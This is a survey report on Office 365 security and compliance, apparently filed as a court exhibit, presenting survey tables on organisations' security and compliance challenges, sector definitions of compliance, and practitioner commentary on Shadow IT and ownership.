For example, Antonio Maio (@AntonioMaio2), a Microsoft MVP and an Associate Director & Senior Enterprise Architect at Protiviti, shared his feedback:

> *"This result is surprising, because when looking at moving into the Microsoft Cloud from a SaaS perspective, from our experience the general approach that most organizations follow is to migrate Exchange first, then OneDrive for Business and then SharePoint. Exchange and OneDrive for Business tend to migrate first because you are typically migrating a person's mailboxes or a person's dedicated network file share.  The fact that those entities are tied to a person tends to make the migration process simpler to plan and execute, and organizations don't tend to take the opportunity to re-organize or clean those up the way they do with SharePoint sites. As a result, as organizations make their journey to the cloud, we tend to see most already have Exchange and/or OneDrive for Business, as opposed to SharePoint."*

*Figure 3 - Which Microsoft workloads are currently used within your organization?*



Less surprised about the high number of responses for Microsoft Teams was Jussi Roine:

> *"Teams is fast closing in on SharePoint. People might not realize O365 Groups is partially the same category. Planner remains a niche, but it would be interesting to ask how many respondents use Project Online with Planner – which seems to be growing."*

CollabTalk

Case 0:20-cv-60416-XXXX   Document 1-83   Entered on FLSD Docket 02/26/2020   Page 10 of 736

# Insights and Definitions

Throughout our research, one theme was consistently expressed by respondents as well as our advisory panel: Security and Compliance should not be the sole responsibility of IT, as summarized in comments made by Antonio Maio:

> *"We see a lot of conversations happening about data security and compliance at the C-suite and board level these days. It has become a priority for executives in many organizations to evaluate and improve the security posture and regulatory compliance controls of their companies. I believe this is in part the reason why we have compliance officers and senior leadership factoring so highly in this survey.*

> *"This is driven in part by the constant data breaches we see at many major enterprises, and leadership's desire to protect their business reputation. This is also driven by new regulations that are designed to protect personal data for the individual, such as the General Data Protection Regulation (GDPR) out of the EU and the California Consumer Privacy Act or 2018 (AB 275), with their wide-ranging mandates and extreme fines.*

> *"We also see circumstances where IT managers or IT team members have a very good sense for the organization's security exposures, but they have a difficult time starting a conversation with their internal legal or compliance departments. From the point of view of raising the conversations about security and compliance within organizations, the fact that so many in a leadership or compliance position are responding to this type of survey is a positive result."*

Security and compliance are rapidly evolving areas within the collaboration technology sector. Many organizations are overly reliant on the tools and platforms they use to provide the right security and compliance coverage. Unfortunately, it is far too common that companies do not do more in these areas until there has been a security breach, or under the threat of fines due to non-compliance. For example, organizations that do business in or with customers in the European Union scrambled to understand and prepare for the General Data Protection Regulation (GDPR) which went into effect in May 2018, rather than proactively create data management policies and procedures to meet these and future industry and governmental changes.

The Office 365 platform supports customers around the world with many different standards and regulations guiding the handling of information assets. As such, Microsoft is constantly adding to the list of compliance and security standards supported, while at the same time expanding their data center footprint to reach customers in under-served areas of the world. While Microsoft's efforts should inform your organizational security and compliance planning, a more holistic and comprehensive review of industry research and trends, expert guidance, and your own internal experience.



Case 0:20-cv-60416-XXXX   Document 1-33 Entered on FLSD Docket 02/26/2020   Page 11 of 736

## Industry Perspectives

As mentioned, it can be important to understand and periodically review major trends and issues within your own and parallel industries. As part of our secondary research, we looked at the topics of security and compliance in several of the leading industries to identify definitions and trends that span all industries, as well as any factors that were unique to a single industry.

We've highlighted some of this research within four key sectors: Public (Federal, State and Local Government), Education, Financial Services, and Healthcare.

### Public Sector

In one presentation given to public sector leaders, compliance was defined as:

> *"the process of ensuring and proving that policies (internal and external) are being followed." (Governance, Risk & Compliance for Public Sector, n.d.)*

A secondary definition that clarifies the most important laws to follow is provided below:

> *"For U.S. Federal agencies, the major security and privacy compliance concerns include the Clinger-Cohen Act of 1996, the Office of Management and Budget (OMB) Circular No. A-130, particularly Appendix III, the Privacy Act of 1974, the E-Government Act of 2002 and its accompanying OMB guidance, and the Federal Information Security Management Act (FISMA) of 2002.11 Also of importance are National Archives and Records Administration (NARA) statutes, including the Federal Records Act (44 U.S.C. Chapters 21, 29, 31, 33) and NARA regulations (Title 36 of the Code of Federal Regulations, Chapter XII, Subchapter B)." (Jansen, 2011)*

From this information, we can infer that the public sector focuses strictly on compliance to specific and extensive regulation, and that the internal processes are not focused on as much as in the Financial Sector.

In our survey, we generally found that members of this industry noticed less clear ownership of security and compliance, focusing more on product lifecycle, and a much higher spread in security and compliance confidence levels between products.

- Specific compliance threats that are larger for this industry than with other industries: Content lifecycle (e.g. all content is retained forever)
- Specific security threats that are larger for this industry than with other industries: No monitoring solution specifically looking for security breaches
- An overview of the Office 365 Security and Compliance Center can be found at https://docs.microsoft.com/en-us/office365/securitycompliance/
- Additional Office 365 security and compliance guidance for the Public Sector can be found at http://bit.ly/O365_PublicSector, which includes links to the Office 365 US Government service plan and plans for Germany, China (21Vianet), and other Public Sector options.



Case 0:20-cv-60416-XXX   Document 1-33 Entered on FLSD Docket 02/26/2020   Page 12 of
726

## Education Sector

The education industry views compliance very similarly to the public sector. Although there is no definition specific to the industry, the following passage helps to understand the viewpoint of the industry:

> *"In addition to the usual security concerns for any enterprise, educational institutions, by virtue of their diverse operations, are subject to numerous compliance regimes, and when it comes to compliance, universities are well aware that you can outsource responsibility, but you can't outsource accountability." (Sasikala, 2010)*

In addition to this viewpoint, a comprehensive list of other laws and regulations can be found at www.higheredcompliance.com

Compliance in the education sector, similarly to the public sector, is concerned with strict adherence to a large amount of regulations without proactive investments.

In our survey, we generally found that members of this industry noticed security ownership completely by IT departments and about average compliance and security confidence scores.

- Specific compliance threats that are larger for this industry than with other industries: Content lifecycle (e.g. all content is retained forever)
- Specific security threats that are larger for this industry than with other industries: Lack of adequate encryption
- Additional Office 365 security and compliance guidance for the Education Sector can be found within the service plan details at http://bit.ly/O365_EDU.

## Financial Services Sector

The financial industry is the most concerned with remaining compliant out of the industries researched here. For the financial services industry, compliance is a proactive endeavor, as described by worldfinance.com

> *"Regulation in the financial services sector will continue to pose a challenge to firms both large and small. Compliance is not just about recognizing the key regulatory pressures facing financial institutions, but also proactively ensuring the company is improving its processes and streamlining its operations. As the challenges around compliance continue to put pressure on firms, finding new solutions and methods will be vital." (World Finance, n.d.)*

For the financial industry more than any others, the focus is on reducing cost and streamlining the internal processes that lead to compliance. Another definition of compliance is given by the International Compliance Association below:

> *"In the context of financial services, businesses compliance operates at two levels. Level 1 - compliance with the external rules that are imposed upon an organization as a whole. Level 2 - compliance with internal systems of control that are imposed to achieve compliance with the externally imposed rules." (International Compliance Association, n.d.)*



Compliance in the Financial Services industry is also meant to preserve reputation. "Protect against loss of reputation" is in the top five priorities for banks in the financial services industry (MetricStream, 2014). Most of this work tends to show in "Level 2" of the definition above, in increasing efficiency of internal processes to more effectively achieve compliance with external rules.

In our survey, we generally found that members of this industry were less familiar (most people not familiar at all) with general trends in security and compliance. Ownership of these problems is at CXO level and CXO's do tend to be somewhat familiar with trends. Security and compliance confidence scores, however, are mostly low.

- Specific compliance threats that are larger for this industry than with other industries: Content lifecycle (e.g. all content is retained forever)
- Specific security threats that are larger for this industry than with other industries: Data protection and recovery from loss and lack of adequate encryption
- Additional Office 365 security and compliance guidance for the Financial Services Sector can be found within the Microsoft Trust Center overview at https://www.microsoft.com/en-us/trustcenter/cloudservices/financialservices

### *Healthcare Sector*

The Healthcare industry's typical definition of compliance is:

> *"The ongoing process of meeting, or exceeding the legal, ethical, and professional standards applicable to a particular healthcare organization or provider...Healthcare compliance covers numerous areas including, but not limited to, patient care, billing, reimbursement, managed care contracting, OSHA, Joint Commission on Accreditation of Healthcare Organizations, and HIPAA privacy and security to name a few. " (Healthcare Compliance, n.d.)*

Although Healthcare is regulated carefully, the Healthcare sector views compliance to these regulations as the extent of their security. In the Compliance Effectiveness Survey, the following conclusion was reached by the researchers:

> *"For any compliance program, a critical measure of success is its ability to prevent incidents from occurring. Determining how many events are avoided is difficult, though. Employees rarely come forward to report, 'I was about to commit a felony and then remembered that compliance training I received.'"*

This statement from an industry-standard source implies that the Healthcare industry views compliance as a type of security, and that compliance to regulation is intended to prevent "incidents", one of the goals of a security strategy.

- There are no specific security or compliance threats that are larger for this industry than with other industries.
- Additional Office 365 security and compliance guidance for the Healthcare Sector can be found within the Microsoft Trust Center overview at https://www.microsoft.com/en-us/trustcenter/cloudservices/health



Case 0:20-cv-60416-XXXX   Document 1-33   Entered on FLSD Docket 02/26/2020   Page 14 of 736

# The Maturity of Office 365 Security and Compliance Standards

To some organizations, moving to the cloud may seem like an unnecessary risk. Microsoft has made huge strides in educating their customers about the stability and security of the cloud, but as our research will help illustrate, there is still much work to be accomplished to help customers understand where their planning and administration efforts may be falling short.

Whether your environment is on-premises, in the cloud, or in a temporary or permanent hybrid state, it is critical that organizations clearly understand their security and compliance requirements, and whether these requirements are being met. All planning should begin with a detailed, step-by-step review of security and compliance policies and procedures, mapping out how each of them is currently accomplished. As organizations consider moving to the cloud, they should use this baseline to understand how each will be accomplished within the future environment, and how current metrics and key performance indicators (KPIs) will be updated.

Antonio Maio shared some insights from his consulting work:

> *"We see many organizations struggle with the fact that their organizational data is spread across so many different systems and applications, making it extremely difficult to manage regulatory compliance controls across all of their data in a consistent manner. Along with the wide-spread storage of data, we see organizations struggle with data ownership – having individuals internally identified as data owners, having data owners understand their responsibilities and having data owners take that responsibility seriously. Classification is just one aspect of being able to control data, in that it helps identify the sensitivity of data. However, applying classification across all an organization's information, not just Office documents and PDFs, is a large undertaking. It requires not only users to classify their data but also systems which will automatically classify information, and whole applications to be classified if they store a particular type of data (ex. a CRM system which stores contact and account data being classified as storing sensitive customer information).*

> *"Generally, inventorying all the systems and applications within an organization which store information and enable collaboration on that information is an effective place to start. Regular compliance assessments and audits of those systems allows organizations to identify where security gaps exist. Consolidating systems is also a strategy used by many organizations, which then tends to precipitate migration projects to move corporate data to a single cloud environment, like Office 365. As part of a move to the cloud, it is recommended that organizations take that opportunity to improve the maturity of their governance policies and procedures, and implement effective compliance controls as part of a migration or digital transformation initiative."*

Microsoft is making tremendous investments in data security and compliance to ensure that they are compliant with local, regional and international security and compliance regulations and standards. Additionally, they are also creating tools and guidelines to help customers become or remain compliant, as well. Microsoft is investing heavily in this area, because they understand that to convince enterprise customers to give up real or perceived control of their data and environments, the company needs to be a leader in security and compliance.

CollabTalk

Case 0:20-cv-60416-XXXX   Document 1-33 Entered on FLSD Docket 02/26/2020   Page 15 of 726

Microsoft has three primary strengths that are helping to accelerate the maturity of their cloud platforms, with Office 365 at the center:

- **Their focus on business**. Microsoft cloud's strength lies in its extensive product base. It is the most attractive solution provider for enterprise customers who already use Microsoft products and are invested (Cloud Cruiser, 2016). There are now 1.2 billion Office users and 60 million Office 365 commercial customers (CALLAHAM, 2016). Both for SMB and Enterprise customers, Microsoft Office products seem to be the foundation for business operations in modern society.  In part because of this, Microsoft wants to focus on targeting businesses instead of specific industries or market segments (Carey, 2017).

- **Rapid expansion of PaaS and IaaS**: Microsoft Azure originally started as a Platform as a Service (PaaS) offering but has since moved toward Infrastructure as a Service (IaaS) (Cloud Cruiser, 2016). Microsoft has made Azure, and other cloud services, a high priority and has gained traction with current Microsoft customers because of Azure's tight integration with existing Microsoft products (AFourTech, 2017).

- **Security as design principle.** Due to the technology shift, more and more customers are willing to move their data to the Microsoft cloud. But their major concern is the security issue. Therefore, Microsoft has invested heavily and focused on improving the security of its cloud products. Recently, according to Microsoft, cyber security has become one of their most important design principles and features because hackers are becoming more sophisticated and organized (MPN Team, 2016). Microsoft offers three levels of security, namely physical security, logical security and data security (MS Office 365, 2016). Apart from these, Office 365 also offers enterprise user and admin controls (Dianne Faigel, 2017). See a list of security features in Appendix A.

This research seeks to determine viewpoints on the governance of security and compliance for organizations in the midst of this shift from on-premises environments to the cloud, helping organizations to better understand where they are in relation to recommended security and compliance standards and best practices. It is also important to address any gaps in organizational planning, whether through the upgrading of tools and reports, modifying well-established IT and business processes, or by trying to better understand how Microsoft is evolving and where their various product and support teams are shifting their own focus – which is often a clear signal to customers and partners about how they must also prepare for change.

## Security Concerns

Cyber-security has become a hot topic in recent years. IT and executive management are on high alert since the breach of Equifax compromised the personal identity of millions of US customers (Daitch, 2017), with seemingly monthly failures of systems owned by banks, online retailers, and other consumer-based product and service providers.

Cyber-security is defined as:

> "... the protection of computer systems from the theft and damage to their hardware, software or information, as well as from disruption or misdirection of the services they provide"[3]

---

[3] Wikipedia, https://en.wikipedia.org/wiki/Computer_security



Case 0:20-cv-60416-AMC   Document 3-3 Entered on FLSD Docket 02/26/2020   Page 422 of 726

Why is it important to protect computer systems? Many companies gather information about who they do business with, such as banks with credit card applications. If the sensitive information used to identify you gets out to the public, others could claim they are you based on possessing that information. Companies therefore have an ethical obligation to safeguard their customers personal information.

As shown in *Table 5 - What are your biggest security challenges?*, the leading cause of concern from our survey respondents is "Shadow IT" (15.9%) followed closely by "Lack of security training for all employees" (15.61%), which could be argued is a clear contributor to the problems with Shadow IT. Shadow IT is defined as:

> *"Shadow IT refers to information technology projects that are managed outside of, and without the knowledge of, the IT department. At one time Shadow IT was limited to unapproved Excel macros and boxes of software employees purchased at office supply stores. It has grown exponentially in recent years, with advisory firm CEB estimating that 40% of all IT spending at a company occurs outside the IT department. This rapid growth is partly driven by the quality of consumer applications in the cloud such as file sharing apps, social media, and collaboration tools, but it's also increasingly driven by lines of business deploying enterprise-class SaaS applications."[4]*

Shadow IT may not be a problem within the workloads of Office 365 and Microsoft Office family of productivity tools, but the use of unauthorized third-party tools and cloud-based services is a problem within most organizations, regardless of company size or industry.

Companies also have information, trade secrets and other sensitive information about what they are developing, that if also compromised could cause them to lose their competitive advantage or cease to be able to operate. Office 365 handles both information types, and it is critical that companies wanting to benefit from using the platform can trust that it will not leak out sensitive information. However, it can be configured to reduce external threats by preventing unauthorized release of sensitive information.

*Table 5 - What are your biggest security challenges?*

| Survey Responses | % |
|---|---|
| Mission critical applications running on legacy hardware | 8.67% |
| Mission critical applications not running latest version or patched | 7.23% |
| Firewall and Protection platforms out of date | 4.91% |
| Lack of adequate encryption | 10.12% |
| No monitoring solution specifically looking for data and security breaches | 13.29% |
| Lack of security training for all employees | 15.61% |
| Lack of security policies and controls | 13.58% |
| Data protection and recovery from loss | 8.96% |
| Shadow IT - apps being used but not under IT management | 15.90% |
| Other | 1.73% |

---

[4] SkyHigh Networks, https://www.skyhighnetworks.com/cloud-security-university/what-is-shadow-it/



As stated in the SkyHigh Networks research mentioned above, the problem of Shadow IT is much larger than the response rate in our research would indicate, encompassing several of the other categories. Our advisory panel was not surprised that Shadow IT was at the top of the respondent data.

From Jussi Roine:

> *"Very expected. Shadow IT, together with BYOD (from previous chart) is a persistent problem for organizations. This reflects with the E1/E3 license plans, that often lack the security tooling and mobile device management capabilities."*

From Microsoft MVP Joanne Klein (@JoanneCKlein), an independent SharePoint and Office 365 Consultant and owner of NexNovus Consulting based in Saskatchewan, Canada:

> *"This demonstrates to me the importance of us getting this right! Either we make the sanctioned tools the "tool of choice" for end-users or they will go elsewhere. Having clearly articulated security policy and controls in place and then training end-users is key."*

Added Antonio Maio:

> *"Shadow IT is a very significant problem for enterprises today.  As we know, it's very easy for information workers to sign up for their own cloud services, such as DropBox or Box, and use that to collaborate with others both inside and outside of their organizations.  As a result, this is starting to drive IT teams, security teams and compliance teams to enable more collaboration solutions which are easy-to-use and corporate approved for their information workers.  They are starting to enable external sharing within SharePoint and OneDrive for Business and self-service site creation or team creation for end users.  This is happening in an effort to enable the business and information workers with the tools they need or want, so that they can be productive day to day.*
>
> *"However, this also creates challenges for IT, security and compliance teams because they still have a mandate to protect and control corporate information, in part due to internal corporate policies but in many cases also due to regulatory compliance requirements.*
>
> *"We see this driving many organizations to create controls around the self-service model, so that users may still request or create their own collaboration spaces but so that IT, security and compliance teams are still informed and can control these spaces. Security training for employees is a continuing challenge as well.  We see more and more organizations requiring employees to take annual information security training in order to improve how information workers manage and security the information they use every day.  In addition, monitoring tools such as Microsoft Cloud App Security enable those with a security and compliance mandate to monitor for suspicious behavior, automatically enforce governance policies and use machine learning to adapt automatically to changing threat landscape."*

Eric Overfield provides some thoughts on how to address this growing problem within your own organization:



Case 0:20-cv-60416-AMC   Document 3-1 Entered on FLSB Docket 02/26/2020   Page 424 of 726

> *"Shadow IT rears its ugly head. Work with your end users, determine what it is they need, and find a way to provide them a reasonable solution within the framework of your organization's policies and procedures. Shadow IT translates to your employees have jobs to do, while the organization has yet to provide the proper tools or training to address those workloads."*

In a 2017 research conducted by CollabTalk and BYU[5], a survey was used to generate key insights into the perceived gaps in Office 365 security. Most of the responses came from small businesses (less than 50 employees) in the technology sector, many of whom identified as consultants who provided development and deployment services for their customers.

- Barely over half of the respondents use Multi-Factor-Authentication, but it was still the most commonly used product (54%). The next most used was Exchange Online Protection (46%)
- When asked how Microsoft could enhance the security of their products, 83% of respondents that commented requested more assistance in understanding and implementing Microsoft products.

This showed a few important points: only about half of the respondents were willing to pay for additional security features. Also, most of the comments pointed to a general confusion around cyber-security with Office 365 products. In other words, they did not know what was available through the platform, whether these features were all (or in part) in use, or whether the features provided exceed, met, or missed their industry and organizational requirements. This lack of education is emphasized in these additional findings from the survey:

- Of those that thought Microsoft security was sufficient, 80 percent have either not run security checks, or do not know if they have
- Of those that did not think Microsoft security was sufficient, only 29 percent have not run, or do not know if they have run, security checks
- Of those who did not think the current security protection offered by Microsoft was sufficient, 57 percent were not aware of Microsoft's cyber-security division, and 71 percent were not aware of Microsoft's overall security strategy
- Only 39 percent of respondents were aware of both Microsoft's overall security strategy and their cyber-security division (55% at least knew about the C.S. division)
- 100 percent of respondents who had experienced a security breach did not think Microsoft security was sufficient, regardless of the cause of the breach (and vice versa, 100% who did not think the security was sufficient has experienced a security breach)
- 88 percent of respondents who did not experience a security breach either do not currently run security checks or do not know if they run security checks

These results highlight a few important points: Those who are confident in the security of Office 365 products are not as careful in running security checks, while those who are skeptical are more cautious. Those who are skeptical, however, do not seem to be aware of Microsoft's cyber-security efforts. Also, every respondent that had experienced a security breach did not think Office 365 security was sufficient, even though none of the reasons indicated were attributable to Microsoft. Finally, less than half of all respondents were aware of Microsoft's overall security strategy and their cyber-security division.

These results lead us to believe that those that believe Office 365 security is sufficient are very trusting, to the point that they do not run security checks, and also that those who don't believe the security is

---

[5] CollabTalk, April 2018. "Understanding Microsoft Cloud Services and Security." https://rencore.com/blog/cyber-security-report-understanding-microsoft-cloud-services-and-security/



sufficient are skeptical because they have experienced data breaches. We also learned that there is a perceived gap in security from a lack of education.

## Addressing Compliance Concerns

One rapidly evolving area within Office 365 is the expansion of auditing and compliance capabilities. Organizations that are considering moving to the cloud entirely or using a hybrid model need to understand the differences between reporting, compliance, and governance capabilities within their existing on-premises and online tools and platform and set expectations about what can be managed out-of-the-box and where third-party solutions will need to be utilized.

Much of the admin experience inside of Office 365 streamlines and automates tasks that you previously had granular control over within the individual on-premises workloads. From an auditing and compliance perspective, this means you need to understand:

1. Your organizational requirements, standards, and policies.
2. What capabilities are possible within each of your hybrid components, from discovery through technical enforcement.
3. What can be managed centrally versus within each individual system or component, and by whom.

Creating a unified administrative experience across on-premises and Office 365 environments is a lofty goal and will require further development and extensibility from Microsoft as well as the partner community. Microsoft is making huge investments in cloud security and compliance, with new hybrid management and security capabilities through the Microsoft Operations Management Suite, targeting three core areas:

1. Insights and Analytics
2. Automation and Control
3. Protection and Recovery

Where Microsoft is putting most of their resources is in expanding the Office 365 Security and Compliance Center (https://protection.office.com/ requires Office 365 login), which is your primary portal for protecting data within Office 365, and for managing all of your auditing and compliance requirements.

Commercial organizations have regulations and policies that they must comply with to operate businesses in various industries. These policies can be a mix of external regulatory requirements that vary depending on industry and geographical location of the organization and internal company-based policies.

Office 365 provides built-in capabilities and customer controls to help customers meet both various industry regulations and internal compliance requirements, staying up-to-date with many of today's ever-evolving standards and regulations, giving customers greater confidence.  To bolster this and to continue earning your confidence, Microsoft undergoes third-party audits by internationally recognized auditors as an independent validation that they comply with all policies and procedures for security, compliance and privacy.

Key aspects of built-in compliance capabilities include third-party audits that verify that Office 365 meets many key world-class industry standards and certifications. Office 365 utilizes a control framework that employs a strategic approach of implementing extensive standard controls that in turn satisfy various industry regulations. Office 365 supports over 900 controls[6] that enable Microsoft to meet complex standards and offer contracts to customers in regulated industries or geographies, like ISO 27001, the EU Model Clauses, HIPAA Business Associate Agreements, FISMA/FedRAMP.

---

[6] https://products.office.com/en/business/office-365-trust-center-compliance

 CollabTalk

In addition, Microsoft employs a comprehensive Data Processing Agreement to address privacy and security concerns around customer data, helping customers comply with local regulations. Read more in Microsoft's *Regulatory Compliance FAQ.*

To give customers the most control over compliance in Office 365, Microsoft provides the following:

### Data Loss Prevention (DLP)

DLP is a strategy and tools to help administrators control the flow of sensitive or critical information outside of the corporate network.

DLP enables administrators to configure policies based on your organization's compliance needs to help reduce the chance that financial information, personally identifiable information (PII), or other key intellectual property data might be inadvertently released. DLP policy tips place notifications directly into your users' email in order to alert them of a potential risk prior to sending an email. These notifications can also act as an educational tool for employees on your corporate compliance policies.

### eDiscovery in the Security & Compliance Center

Electronic Discovery, or eDiscovery, is the process through which electronic records are sought, searched, located, and secured with the intent of using it for legal matters.

This capability on Office 365 allows you to search for content across SharePoint Online sites, Exchange Online mailboxes, OneDrive for Business accounts, or across all of them. The Security & Compliance center allows you to create "cases" which will provide a collaborative space for you to gather key components required for your evidentiary requirements. With eDiscovery in Office 365, you are able to discover any of the content stored in your environment, including archived emails.

### Archiving in Office 365

Messaging records management (MRM) is the technology at the heart of data retention in Office 365. The configuration options allow you to apply records management policies to both Exchange Online and SharePoint content in order to specify content that should be retained and clean-up content that is no longer needed. Audit logging and reporting is available to track anything from Administrator actions to document access and deletion. There are many logging and reporting options that can be configured to fit your needs.

Combining email archiving and eDiscovery can make life easier for both users and administrators by reducing the amount of inbox organizing to be done, and automatically applying data retention policies based on the type of content being used. The added benefit of email archiving is that even if your users store emails in independent archive files on local machines or in cloud storage like Dropbox, the archived emails are still within reach of your IT team.

### Continuous Compliance Services

Office 365 Security & Compliance provides a framework of processes and controls that Office 365 uses to proactively monitor and manage the platform. With over 900 controls in place, and more being added every month, Microsoft is continually reviewing its own data handling policies and procedures to ensure that evolving customer and industry standards are being upheld.

As new customers are added to the service, each customer agreement details the privacy, security, and data handling processes necessary for you to comply with local data regulations.



Case 0:20-cv-60416-XXXX   Document 1-83   Entered on FLSB Docket 02/26/2020   Page 21 of 36

Microsoft is constantly reviewing evolving and changing industry standards to ensure that Office 365 compliance framework is current.

Additionally, legal hold and eDiscovery capabilities are built into the system to help you find, preserve, analyze, and package electronic content for legal request or investigation, and Data Loss Prevention to help you identify, monitor, and protect sensitive information.

### International Compliance Standards and Certifications

Microsoft recognizes that customers around the world are subject to various laws and regulations. The legal requirements and standards in one country or region may not be applicable in other regions. As Microsoft expands into more regions, countries, and economic zones, the company is constantly expanding their services and capabilities to enable compliance across a wide range of regulations and privacy mandates to meet their customer needs.

The list below provides an overview of some of the leading compliance standards and certifications provides through the Office 365 platform. However, it is ultimately up to the customer to determine whether these standards satisfy your regulatory requirements. You can find out about the latest Microsoft certifications at https://servicetrust.microsoft.com/

- Health Insurance Portability and Accountability Act (HIPAA)
- Data processing agreements (DPAs)
- Federal Information Security Management Act (FISMA)
- Federal Risk and Authorization Program (FedRAMP)
- ISO 27001
- European Union (EU) General Data Protection Regulation (GDPR)
- EU-U.S. Privacy Shield Framework
- Family Educational Rights and Privacy Act (FERPA)
- Statement on Standards for Attestation Engagements No. 16 (SSAE 16)
- Canadian Personal Information Protection and Electronic Documents Act (PIPEDA)
- Gramm–Leach–Bliley Act (GLBA)

Based on our research, Table 6 shows that the top three most widely cited compliance challenges identified by the survey respondents include:

1. End users don't classify data correctly and/or take required actions (38%)
2. Content stored in legacy content systems (35%)
3. Content spread across multiple workloads (34%)



Case 0:20-cv-60416-XXX   Document 1-33 Entered on FLSB Docket 02/26/2020   Page 22 of 726

*Table 6 - What are your biggest compliance challenges?*

| Answer | % |
|---|---|
| End users don't classify data correctly and / or take required actions | 37.95% |
| Content stored in Legacy content systems, such as File Shares, Documentum, FileNet, HP TRIM, etc. | 35.38% |
| Content spread across multiple workloads (Exchange/Outlook, Teams, Yammer) | 33.85% |
| Content lifecycle (e.g. all content is retained forever) | 32.82% |
| Insufficient planning and/or poorly executed compliance strategy | 27.69% |
| Difficulty incorporating conflicting or differing compliance rules across the organization | 18.97% |
| Bring Your Own Device (BYOD) policies and procedures | 10.77% |
| Protecting consumer data | 10.26% |
| Difficulty with business partner or contractor compliance | 9.23% |
| Other (please specify) | 2.05% |

Our advisory panel had ample feedback for the lack of controls, and over-reliance on end users to "do the right thing" when it comes to compliance. According to Joanne Klein:

> *"This demonstrates to me how the end-user is seen as the key player in compliance and the importance of not only training, but implementing as many automated controls as possible. This will reduce the risk of an end-user not taking the right action on their own."*

More specifically, Microsoft MVP and CTO of Toronto-based 2toLead, Richard Harbridge (@RHarbridge) pointed to the problem end users (and experts alike) have in keeping up with the rapid pace of change in the platform:

> *The biggest issue with a company's security and compliance strategy is the lack of expertise. This space is moving fast. You need to be up to date on what's possible, what works well, what doesn't and what you should prioritize. Many customers just don't have the right people focused on this, or don't support them by modernizing technology faster and more effectively. Most of the issues are worse when you have legacy technology and/or legacy approaches.*

Continued Eric Overfield:

> *"Why is this no shocker that the primary compliance challenge is the lack of end user provided classification and metadata? I only blame the end user to a point, before this point, I look at those that created the system in the first place. What roadblocks were unnecessarily added, or unnecessarily left in place that could be removed. It is incumbent upon the solution architects to consider the end users' experience.*

CollabTalk

> *"On the other end of the spectrum, I am also not surprised that few are blaming Office 365 in general. The tools exist, we need to use them correctly. That takes an upfront investment for sure, yet worth it in the long run."*

Going back to the core problem of Shadow IT, Joanne Klein once again identifies the problems that can occur due to a lack of end user education:

> *End-user's general lack of understanding of security and compliance risks needs to be addressed for handling controls, security controls, compliance (retention) controls. You can have all of the advanced tools in place, but if an end-user wants to circumvent the sanctioned tools, they will. However, if they understand the risks in doing that, they will be less likely to do so.*

## The Ownership Dilemma

Looking across all security and compliance requirements, there is rarely one role or a single group or program that addresses all of these functions. The executive role of Chief Security Officer is uncommon for most enterprises – and non-existent within smaller companies. Instead, IT teams are tasked with ownership of the technology platforms and physical security operations, with compliance managed through operations, which can sometimes mean the Support team or a formal Project Management Organization (PMO). Without clear ownership and leadership from the top-down, security and compliance are not adequately monitored and managed.

As one respondent summarized, "This needs to change. No longer can IT have ownership of Security and Compliance since this is more than just a technical challenge."

As shown below in *Figure 4,* our survey respondents fit within industry norms, pointing toward IT departments as the primary owner. Surprisingly, executives were identified as the second highest response, which may indicate a slow but steady wave of change as organizations begin to understand the importance of these topics to the company's bottom-line.



*Figure 4 - Who owns security and compliance within your organization?*

CollabTalk

Antonio Maio points out one of the repercussions of relying too much on IT to manage legal and compliance issues:

> *"This reflects what we see in industry, where IT tends to own security and compliance. However, security and compliance should be owned by a Chief Information Security Officer (CISO), Compliance Team or Legal Team, so that corporate security initiatives have appropriate executive level sponsorship.  In cases where IT owns security and compliance, we often see that IT has a hard time starting or carrying conversations with legal and compliance teams in order to get that executive level buy in."*

One of the biggest areas of concern for organizations that surfaced consistently within the individual interviews but was not reflected within the surveys (not included as a possible answer): whether Microsoft will be compliant, or can help them become compliant, to these standards. Respondents wanted to better understand what more Microsoft could do to help manage their security and compliance issues.

One response to this comment is with moving to the cloud itself. Microsoft is able to move much more quickly than individual companies to ensure that rapidly changing laws and standards are being met by the Office 365 platform. Additionally, they are better able to adapt and change to the ever-changing threats that are intentional or unintentional, rolling out updates and improvements to customers as quickly as necessary, providing real-time protection of their data and systems. This is one of the primary benefits of the cloud model – reducing the work and cost of proactive security of your data and intellectual property.

## The Confidence Gap

One of the surveys and interview techniques used was to ask broad questions about knowledge and confidence in the functional capabilities of the Office 365 platform, followed by more granular questions to determine how accurately the broader questions were answered. It is very common for respondents to overly attribute positive responses to questions about their company's understanding of their own requirements, the completeness of their planning activities, and whether all available options and features are being utilized.

In other words, respondents will generally paint their organization in the most positive light. By also asking specific questions about core capabilities, we begin to identify a confidence gap across all three areas: most organizations do not fully understand their own requirements, therefore they do not conduct proper planning, and most do not utilize (or are even aware of) all of the features that are available and whether these unused capabilities would help them meet their requirements.

As you can see in Table 7 below, most respondents indicated that they are "Not At All Familiar" or "Somewhat Familiar" with Office 365's security and compliance capabilities.

CollabTalk

Case 0:20-cv-60416-XXXX   Document 1-33   Entered on FLSD Docket 02/26/2020   Page 25 of 736

*Table 7 - How familiar are you with Microsoft's security & compliance offerings for Office 365?*

| Question | Not at all familiar | Somewhat Familiar | Familiar | Very Familiar |
|---|---|---|---|---|
| Alerts: Alerting on end user and admin actions, as well as content | 19.35% | 29.03% | 29.03% | 22.58% |
| Classifications: Labels and Policies to categorize content and retention | 19.35% | 32.26% | 19.35% | 29.03% |
| Data Loss Prevention: Data Loss Prevention policies for controlling sensitive data such as PII | 22.22% | 28.57% | 28.57% | 20.63% |
| Data Governance: Archive and supervisory review of user's communication | 30.65% | 37.10% | 17.74% | 14.52% |
| Threat Management: Advanced Threat Protection for emails and links. Also, attack simulation for testing end-user security | 29.03% | 35.48% | 22.58% | 12.90% |
| Data Privacy: GDPR Dashboard, and Data Subject Request case management | 32.26% | 30.65% | 22.58% | 14.52% |
| Search & Investigation: Content and Audit Log investigation. eDiscovery and Cloud App Security | 20.97% | 33.87% | 25.81% | 19.35% |

The question is: how do you interpret this information? Again, if you factor into your analysis the organizational bias that most people have, typically attributing an overly-positive score to their own teams, these numbers are likely top-heavy–which is reflected in the larger gaps in the more granular, feature-specific questions.  As Eric Overfield points out, there is a definite education gap:

> *"I am not sure how to interpret this, as across the board only one-third of respondents are claiming to be familiar with each of the different features highlighted. My best guess is that, in general, the available features are not making it into the conversation enough to hit the radars of those responsible for implementing and/or utilizing security and compliance features."*

According to Antonio Maio, however, progress is being made:

> *"We are seeing familiarity with security and compliance capabilities growing, but many organizations are still discovering which security and compliance tools are available to them in the cloud."*

We also asked respondents to share their thoughts on their most-used Office 365 workloads. The purpose of including this question was not to test respondent knowledge of the security and compliance capabilities within each workload, but to gauge their confidence in both security and compliance standards.

CollabTalk

